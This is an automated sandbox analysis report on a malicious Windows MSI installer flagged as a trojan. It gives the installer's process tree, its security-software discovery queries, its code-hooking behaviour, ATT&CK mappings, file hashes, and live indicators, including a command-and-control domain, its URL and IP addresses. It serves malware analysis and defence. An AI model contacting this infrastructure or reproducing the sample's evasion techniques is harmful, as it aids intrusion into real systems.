            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Replication Through Removable Media            		31
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            Credential API Hooking            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API            		1
            Windows Service            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory11
            Peripheral Device Discovery            		Remote Desktop Protocol1
            Credential API Hooking            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter            		11
            Registry Run Keys / Startup Folder            		1
            Windows Service            		2
            Obfuscated Files or Information            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Service Execution            		Login Hook11
            Process Injection            		1
            DLL Side-Loading            		NTDS75
            System Information Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
            Registry Run Keys / Startup Folder            		1
            File Deletion            		LSA Secrets191
            Security Software Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
            Masquerading            		Cached Domain Credentials5
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items5
            Virtualization/Sandbox Evasion            		DCSync2
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1450377 Sample: CrzA2u67LQ.msi Startdate: 01/06/2024 Architecture: WINDOWS Score: 40 86 Multi AV Scanner detection for domain / URL 2->86 88 Multi AV Scanner detection for dropped file 2->88 90 Multi AV Scanner detection for submitted file 2->90 92 2 other signatures 2->92 8 msiexec.exe 51 54 2->8         started        12 windows10.exe 2->12         started        14 cmd.exe 13 2->14         started        16 2 other processes 2->16 process3 dnsIp4 64 C:\Windows\Installer\MSI5DEF.tmp, PE32 8->64 dropped 66 C:\Windows\Installer\MSI5DCF.tmp, PE32 8->66 dropped 68 C:\Windows\Installer\MSI5820.tmp, PE32 8->68 dropped 70 6 other malicious files 8->70 dropped 100 Drops executables to the windows directory (C:\Windows) and starts them 8->100 19 windows10.exe 8->19         started        22 MSI5DCF.tmp 1 8->22         started        35 2 other processes 8->35 102 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 12->102 24 windows10.exe 12->24         started        26 windows10.exe 12->26         started        28 windows10.exe 12->28         started        37 2 other processes 12->37 30 chrome.exe 14->30         started        33 conhost.exe 14->33         started        72 127.0.0.1 unknown unknown 16->72 file5 signatures6 process7 dnsIp8 94 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 19->94 39 windows10.exe 19->39         started        42 windows10.exe 19->42         started        44 windows10.exe 19->44         started        53 2 other processes 19->53 46 cmd.exe 1 22->46         started        48 windows10.exe 24->48         started        80 192.168.2.4, 138, 443, 49723 unknown unknown 30->80 82 192.168.2.5 unknown unknown 30->82 84 2 other IPs or domains 30->84 50 chrome.exe 30->50         started        signatures9 process10 dnsIp11 96 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 39->96 55 windows10.exe 39->55         started        58 conhost.exe 46->58         started        60 sc.exe 1 46->60         started        62 sc.exe 1 46->62         started        74 www.google.com 172.217.18.4, 443, 49739, 49752 GOOGLEUS United States 50->74 76 216.58.206.68, 443, 49756 GOOGLEUS United States 50->76 78 winrarbrasil.from-mn.com 45.90.123.184, 443, 49735, 49736 DEDIPATH-LLCUS Germany 50->78 signatures12 process13 signatures14 98 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 55->98

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            CrzA2u67LQ.msi27%VirustotalBrowse
            CrzA2u67LQ.msi32%ReversingLabsWin32.Trojan.InjectorX

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll100%Joe Sandbox ML
            C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll49%ReversingLabsWin32.Trojan.InjectorX
            C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll34%VirustotalBrowse
            C:\Users\user\Pictures\fotosdaviagem\windows10.exe3%ReversingLabs
            C:\Users\user\Pictures\fotosdaviagem\windows10.exe5%VirustotalBrowse
            C:\Windows\Installer\MSI55AB.tmp0%ReversingLabs
            C:\Windows\Installer\MSI55AB.tmp1%VirustotalBrowse
            C:\Windows\Installer\MSI5723.tmp0%ReversingLabs
            C:\Windows\Installer\MSI5723.tmp1%VirustotalBrowse
            C:\Windows\Installer\MSI5762.tmp0%ReversingLabs
            C:\Windows\Installer\MSI5762.tmp1%VirustotalBrowse
            C:\Windows\Installer\MSI5783.tmp0%ReversingLabs
            C:\Windows\Installer\MSI5783.tmp1%VirustotalBrowse
            C:\Windows\Installer\MSI5820.tmp0%ReversingLabs
            C:\Windows\Installer\MSI5820.tmp1%VirustotalBrowse
            C:\Windows\Installer\MSI5DCF.tmp0%ReversingLabs
            C:\Windows\Installer\MSI5DCF.tmp0%VirustotalBrowse
            C:\Windows\Installer\MSI5DEF.tmp0%ReversingLabs
            C:\Windows\Installer\MSI5DEF.tmp0%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://g.live.com/odclientsettings/Prod.C:0%URL Reputationsafe
            https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
            https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
            https://g.live.com/odclientsettings/ProdV20%URL Reputationsafe
            http://www.indyproject.org/0%URL Reputationsafe
            https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c960%URL Reputationsafe
            https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b60%URL Reputationsafe
            http://ip-api.com/json/0%VirustotalBrowse
            http://www.audio-tool.net5%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            winrarbrasil.from-mn.com
            		45.90.123.184
            		truefalse
              		unknown
              www.google.com
              		172.217.18.4
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://winrarbrasil.from-mn.com/favicon.icofalse
                  		unknown
                  https://winrarbrasil.from-mn.com/clientes/inspecionando.phpfalse
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000000E.00000003.1778037537.000001D047FAF000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.ver)svchost.exe, 0000000E.00000002.4162711913.000001D048000000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000000E.00000003.1778037537.000001D047F53000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1778037537.000001D047FB7000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://g.live.com/odclientsettings/ProdV2svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.audio-tool.netwindows10.exe, 00000005.00000000.1727345911.0000000000497000.00000002.00000001.01000000.00000005.sdmpfalseunknown
                      http://www.indyproject.org/windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2147178855.000000007F8AE000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://ip-api.com/json/windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2147178855.000000007F8AE000.00000004.00001000.00020000.00000000.sdmpfalseunknown
                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      172.217.18.4
                      		www.google.comUnited States
                      		15169GOOGLEUSfalse
                      45.90.123.184
                      		winrarbrasil.from-mn.comGermany
                      		35913DEDIPATH-LLCUSfalse
                      216.58.206.68
                      		unknownUnited States
                      		15169GOOGLEUSfalse
                      239.255.255.250
                      		unknownReserved
                      		unknownunknownfalse

                      Private

                      IP
                      192.168.2.7
                      192.168.2.4
                      192.168.2.5
                      127.0.0.1

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1450377
                      Start date and time:2024-06-01 19:03:44 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 13m 43s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:32
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Sample name:CrzA2u67LQ.msi
                      renamed because original name is a hash value
                      Original Sample Name:a477e01f4afeaee40323a6981773ab20f7405c013f6a0398c9126e73d057616a.msi
                      Detection:MAL
                      Classification:mal40.evad.winMSI@60/37@6/8
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 84%
                      • Number of executed functions: 57
                      • Number of non-executed functions: 319
                      Cookbook Comments:
                      • Found application associated with file extension: .msi
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.185.174, 64.233.166.84, 34.104.35.123, 184.28.90.27, 192.229.221.95, 217.20.57.34, 142.250.185.99, 2.19.126.137, 142.250.186.110
                      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      13:04:44API Interceptor2x Sleep call for process: svchost.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      239.255.255.2503qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                        https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exeGet hashmaliciousUnknownBrowse
                          https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exeGet hashmaliciousUnknownBrowse
                            https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exeGet hashmaliciousUnknownBrowse
                              5R3DfRZ1Kb.exeGet hashmaliciousUnknownBrowse
                                https://1drv.ms/o/s!Ale5u7cgFrqDgrU1Y9FuTirE1RVPjA?e=U3XZbQGet hashmaliciousSharepointPhisherBrowse
                                  Quarantined Messages.zipGet hashmaliciousHTMLPhisherBrowse
                                    https://login.palmspringsvrbo.comGet hashmaliciousUnknownBrowse
                                      https://login.palmspringsvrbo.com/?26051923Get hashmaliciousUnknownBrowse
                                        http://url7923.marsello.ioGet hashmaliciousUnknownBrowse

                                          Domains

                                          No context

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          DEDIPATH-LLCUSUyWmCsMy4T.elfGet hashmaliciousMiraiBrowse
                                          • 45.12.141.82
                                          lustsorelfar.exeGet hashmaliciousUnknownBrowse
                                          • 45.14.194.253
                                          lustsorelfar.exeGet hashmaliciousUnknownBrowse
                                          • 45.14.194.253
                                          SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                          • 185.228.19.37
                                          SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                          • 185.228.19.54
                                          EXCEL_DOCUMENT_OPEN.jsGet hashmaliciousUnknownBrowse
                                          • 103.124.105.125
                                          EXCEL_DOCUMENT_OPEN.jsGet hashmaliciousUnknownBrowse
                                          • 103.124.105.125
                                          4_10_AC-7539.xlsxGet hashmaliciousDarkGate, MailPassViewBrowse
                                          • 103.124.105.125
                                          https://yesterwebring.neocities.orgGet hashmaliciousPhisherBrowse
                                          • 45.89.106.174
                                          statapril2024-5892.xlsxGet hashmaliciousDarkGate, MailPassViewBrowse
                                          • 103.124.106.237

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          28a2c9bd18a11de089ef85a160da29e43qWvYGcbza.exeGet hashmaliciousUnknownBrowse
                                          • 20.114.59.183
                                          https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exeGet hashmaliciousUnknownBrowse
                                          • 20.114.59.183
                                          https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exeGet hashmaliciousUnknownBrowse
                                          • 20.114.59.183
                                          5R3DfRZ1Kb.exeGet hashmaliciousUnknownBrowse
                                          • 20.114.59.183
                                          file.exeGet hashmaliciousClipboard Hijacker, PureLog Stealer, RisePro Stealer, zgRATBrowse
                                          • 20.114.59.183
                                          https://1drv.ms/o/s!Ale5u7cgFrqDgrU1Y9FuTirE1RVPjA?e=U3XZbQGet hashmaliciousSharepointPhisherBrowse
                                          • 20.114.59.183
                                          PROFORMA INV.pif.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 20.114.59.183
                                          https://login.palmspringsvrbo.comGet hashmaliciousUnknownBrowse
                                          • 20.114.59.183
                                          http://new-flirt.click/?f=qqrntu&s=687474703a2f2f646174696e6773722e636f6d2f6e65772f3f733d383426263533313839333833383938383631372664693d37672d323031382665643d64657526693d61646d696e38342c38323039372c526f6e6e792e4a61656765724064657574736368656261686e2e636f6d2c2674733d3137313730373738313726313133383530393031393535373338&Get hashmaliciousUnknownBrowse
                                          • 20.114.59.183
                                          https://lifetimeagriculturalproducer.com/watch.1366627561707?key=f02bf7f95ce614ece659fd3b99a43ebf&kw=%5B%2230-05-2024%22,%22nee%22,%22naan%22,%22kadhal%22,%22%E2%80%A2%22,%22thiraithee%22%5D&refer=https://thiraithee.net/vijay-tv-programs/nee-naan-kadhal/30-05-2024-nee-naan-kadhal/&tz=-4&dev=r&res=14.31&uuid=Get hashmaliciousUnknownBrowse
                                          • 20.114.59.183

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\Pictures\fotosdaviagem\windows10.exez1Pedido-Faturado-NF-938731.cmdGet hashmaliciousUnknownBrowse
                                            arquivo.msiGet hashmaliciousUnknownBrowse
                                              z1Intimacao-eletronica.msiGet hashmaliciousUnknownBrowse
                                                Nota.msiGet hashmaliciousUnknownBrowse
                                                  C:\Windows\Installer\MSI55AB.tmpHomeDesk.msiGet hashmaliciousUnknownBrowse
                                                    z1Pedido-Faturado-NF-938731.cmdGet hashmaliciousUnknownBrowse
                                                      arquivo.msiGet hashmaliciousUnknownBrowse
                                                        25690.01808D.msiGet hashmaliciousUnknownBrowse
                                                          fatKCMAGKKH.msiGet hashmaliciousUnknownBrowse
                                                            SPMServer_2024.3.5.473.exeGet hashmaliciousUnknownBrowse
                                                              SPMServer_2024.2.1.7.exeGet hashmaliciousUnknownBrowse
                                                                SPMServer_2024.3.1.22.exeGet hashmaliciousUnknownBrowse
                                                                  Df.mes-25664.msiGet hashmaliciousUnknownBrowse
                                                                    FatRE012024.msiGet hashmaliciousUnknownBrowse

                                                                      Created / dropped Files

                                                                      C:\Config.Msi\6450da.rbs

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):9446
                                                                      Entropy (8bit):5.534642335124091
                                                                      Encrypted:false
                                                                      SSDEEP:96:4wKkAAQlZ/RdLc3Yl6MoJmlRERT4g5HN+1pd+raR9mK2TUdBFjQbLe5ubiWhNKBf:4jkfqdOCetZ2fHkEwnSzimH
                                                                      MD5:EC210E5929561F2EF410000E259CEEA4
                                                                      SHA1:2AEEED529167FAF7F8C016D1631223FB670D1578
                                                                      SHA-256:1B1267DE31A8FD25BF2D28903BD54C2C751228B425650A6BBDCE1108428AE0F3
                                                                      SHA-512:A129AE2043D06EF2E91B5EEBB359AFB21753BA02C84C7B71523E8AB47887981A7591F00EAA9240134234CF75F57BF9DA7E8388AC463A1438F00FDAE99029D012
                                                                      Malicious:false
                                                                      Preview:...@IXOS.@.....@.h.X.@.....@.....@.....@.....@.....@......&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}..Aplicativo Windows..CrzA2u67LQ.msi.@.....@?....@.....@........&.{A964743B-CAFF-41FA-9500-18A10960F691}.....@.....@.....@.....@.......@.....@.....@.......@......Aplicativo Windows......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{60715A9F-4AEC-4D83-B87A-914CE6AF84AD}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{232B65CE-07F2-4C09-8446-D0B152043BFA}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{22B4B4EB-20D3-4CCD-A51F-EBD421917779}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{3A6531DD-7594-4904-AAB9-32F10FD461DF}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{4669957E-4874-4408-AF9D-19502B394F45}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{7FA89396-444D-4152-8B48-A5E58414D67B}&.{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}.@......&.{1A182076-3D9

                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6f5f707f, page size 16384, DirtyShutdown, Windows version 10.0
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.42210529176967665
                                                                      Encrypted:false
                                                                      SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                      MD5:D57C72DF476685B7732594E20FF93BD3
                                                                      SHA1:8BAF80AC3AA0C59AAB109D181D4370F011E449EA
                                                                      SHA-256:D00001848DB0ADB3F8E95585E703F9A01118C19791472DD6D1ED740377CF0991
                                                                      SHA-512:69274E82F3F2D7E789ED75BD192504ADE680E0BA1C4A7EA13557D622281CE1D701C3B7820281A4A05C4A889F8138EC9B03D67355C166E9E39BB691FFBEBF9278
                                                                      Malicious:false
                                                                      Preview:o_p.... .......A.......X\...;...{......................0.!..........{A.-....|I.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................C.].-....|#.................B.k.-....|I..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\MSI44f71.LOG

                                                                      Download File
                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):247128
                                                                      Entropy (8bit):3.812641351766904
                                                                      Encrypted:false
                                                                      SSDEEP:1536:fE4LHF63jJ/DoR+NlZLHv1rujed1v2bCGB1ZOavPViOl7EoSDg6CdKLjTyzvL8Dt:4YHQTZdjfnftwhhcbPSVR88JP0d
                                                                      MD5:580D93BFE1199962367F1A621F32DD18
                                                                      SHA1:0BC009975A1E706DB27C79F3C76A87519E91D6C2
                                                                      SHA-256:4EC6F197590216A5A024BFF998057CE46704BD5F9299E4D9EBCBCE0F8D13F844
                                                                      SHA-512:42754786D932A04DBF4F8728ACA4E74A952B8B03D483AC4DE795DB8231162B465B44B5CB046D77128AAC3F14C7BB49D4108FBA133B9E68C84B701159E9AA93BA
                                                                      Malicious:false
                                                                      Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.1./.0.6./.2.0.2.4. . .1.3.:.0.4.:.3.5. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.F.C.:.0.0.). .[.1.3.:.0.4.:.3.5.:.9.6.8.].:. .F.o.n.t. .c.r.e.a.t.e.d... . .C.h.a.r.s.e.t.:. .R.e.q.=.0.,. .R.e.t.=.0.,. .F.o.n.t.:. .R.e.q.=.M.S. .S.h.e.l.l. .D.l.g.,. .R.e.t.=.M.S. .S.h.e.l.l. .D.l.g.......M.S.I. .(.c.). .(.F.C.:.0.0.). .[.1.3.:.0.4.:.3.5.:.9.6.8.].:. .F.o.n.t. .c.r.e.a.t.e.d... . .C.h.a.r.s.e.t.:. .R.e.q.=.0.,. .R.e.t.=.0.,. .F.o.n.t.:. .R.e.q.=.M.S. .S.h.e.l.l. .D.l.g.,. .R.e.t.=.M.S. .S.h.e.l.l. .D.l.g.......M.S.I. .(.c.). .(.F.C.:.3.0.). .[.1.3.:.0.4.:.3.6.:.0.4.6.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.F.C.:.3.0.). .[.1.3.:.0.4.:.3.6.:.0.4.6.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .

                                                                      C:\Users\user\Documents\Windows10.cmd

                                                                      Download File
